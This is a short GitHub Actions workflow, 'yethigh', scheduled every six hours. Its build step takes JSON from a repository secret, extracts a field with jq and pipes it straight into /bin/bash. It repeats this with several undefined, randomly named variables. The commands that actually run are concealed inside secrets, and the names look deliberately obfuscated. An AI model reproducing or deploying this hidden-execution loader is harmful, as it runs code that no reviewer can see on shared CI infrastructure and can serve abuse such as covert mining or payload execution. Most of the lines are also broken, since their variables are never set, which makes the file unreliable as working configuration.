name: yethigh
on:
  workflow_dispatch:
  schedule:
    - cron: '31 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yethigh
        env:
          o26: ${{ secrets.o26 }}
        run: |
          echo $o26 | jq -r .csxzr8295 | /bin/bash
          echo $l407 | jq -r .tug345 | /bin/bash
          echo $z4 | jq -r .eoywm52972 | /bin/bash
          echo $si65 | jq -r .spq9 | /bin/bash
          echo $ib36954 | jq -r .elldc8 | /bin/bash
          echo $bq97 | jq -r .llghg775 | /bin/bash
          echo $f607 | jq -r .cqi75054 | /bin/bash

